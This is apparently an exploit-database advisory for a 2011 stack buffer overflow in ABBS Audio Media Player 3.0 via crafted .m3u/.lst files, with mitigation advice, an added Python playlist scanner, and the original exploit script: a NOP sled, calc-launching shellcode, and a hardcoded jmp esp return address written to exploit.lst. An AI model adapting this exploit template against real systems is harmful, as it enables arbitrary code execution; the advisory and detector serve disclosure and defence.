Vendor: ABBS Audio Media Player
By: Rh0
CVSS: 9.3 (HIGH)
Buffer Overflow
CWE: 119
Product Name: ABBS Audio Media Player
Affected Version From: 3
Affected Version To: 3
Patch Exists: YES
Related CWE: N/A
CPE: a:abbs:abbs_audio_media_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Pro SP3 EN (VirtualBox)
2011

ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)

ABBS Audio Media Player 3.0 is vulnerable to a stack buffer overflow that is triggered when a specially crafted .m3u or .lst file is opened. The exploit code creates a file named exploit.lst containing a 4108-byte buffer followed by a return address and a jump backwards of 4116 bytes. The return address points to a jmp esp instruction in user32.dll. The shellcode is a WinExec call to calc.exe.

Mitigation:

Upgrade to the latest version of ABBS Audio Media Player.
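
Where upgrading cannot happen immediately, playlist files can be screened before they reach the player. The check below is an added example (not part of the original advisory or the exploit author's code) that flags .m3u/.lst files with the shape described above: a single entry thousands of bytes long, or entries containing control bytes. The 1024-byte threshold, the function names and the sample files are assumptions constructed for illustration.

```python
import os
import tempfile

PLAYLIST_EXTS = {".m3u", ".lst"}
MAX_ENTRY_LEN = 1024  # assumed threshold; Windows MAX_PATH is 260, URLs rarely exceed 1 KB

def scan_playlist_bytes(data):
    """Return findings for the raw bytes of one playlist file."""
    findings = []
    # bytes.splitlines() splits only on \n, \r and \r\n, so binary filler stays on one line
    for lineno, line in enumerate(data.splitlines(), start=1):
        if len(line) > MAX_ENTRY_LEN:
            findings.append((lineno, "oversized-entry", len(line)))
        # Control bytes (except tab) and DEL do not occur in file paths or URLs
        ctrl = sum(1 for b in line if (b < 0x20 and b != 0x09) or b == 0x7F)
        if ctrl:
            findings.append((lineno, "control-bytes", ctrl))
    return findings

def scan_tree(root):
    """Walk root and return {path: findings} for suspicious .m3u/.lst files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in PLAYLIST_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                findings = scan_playlist_bytes(fh.read())
            if findings:
                report[path] = findings
    return report

def demo():
    """Build two constructed samples in a temp directory and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "ok.m3u"), "wb") as fh:
            fh.write(b"#EXTM3U\r\nC:\\Music\\track01.mp3\r\n")
        # Constructed inert sample: one 4108-byte entry plus placeholder bytes,
        # matching only the size and shape described on this page
        with open(os.path.join(tmp, "big.lst"), "wb") as fh:
            fh.write(b"A" * 4108 + b"\x01\x02\x03\x04")
        return {os.path.basename(p): f for p, f in scan_tree(tmp).items()}

if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings)
```

High bytes (0x80 and above) are deliberately not flagged, since playlists with non-ASCII file names contain them legitimately; entry length is the primary signal.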
Source

Exploit-DB raw data:

# Exploit: ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)
# Date: 14.03.11
# Author: Rh0 (Rh0[at]z1p.biz)
# Software Link: http://abbs.qsnx.net/downloads/abbs-amp.zip
# Version: 3.0
# Tested on: WinXP Pro SP3 EN (VirtualBox)

print "[*] Stack buffer overflow in ABBS Audio Media Player 3.0 [*]"
bufferlen = 4108;				# buffer until return address overwrite
nops = "\x90" * 5;
## WinExec("calc",1)
shellcode = (
		"\x33\xC0"			# xor eax,eax
		"\x50"				# push eax
		"\x68\x63\x61\x6C\x63"		# push 'calc'
		"\x8B\xDC"			# mov ebx, esp
		"\xB0\x01"			# mov al, 1
		"\x50"				# push eax
		"\x53"				# push ebx
		"\xB8\x0C\x25\x86\x7C"		# mov eax, 7C86250C
		"\x04\x01"			# add al, 1
		"\xFF\xD0"			# call eax (WinExec@kernel32.dll)
		)
			
ret = "\x87\xa7\xa7\x7c";			# jmp esp @user32.dll (0x7ca7a787)
esp = "\xe9\xeb\xef\xff\xff";	# jmp backwards 4116 bytes

buffer  = nops
buffer += shellcode
buffer += "A" * (bufferlen - len(buffer))
buffer += ret;
buffer += esp;

try:
	A = open("exploit.lst","wb")		# exploit works also with .m3u
	A.write(buffer)
	A.close()
	print "[*] exploit.lst created [*]"
except:
	print "[*] Error while creating file [*]"

print "[*] Enter to continue.. [*]"
raw_input()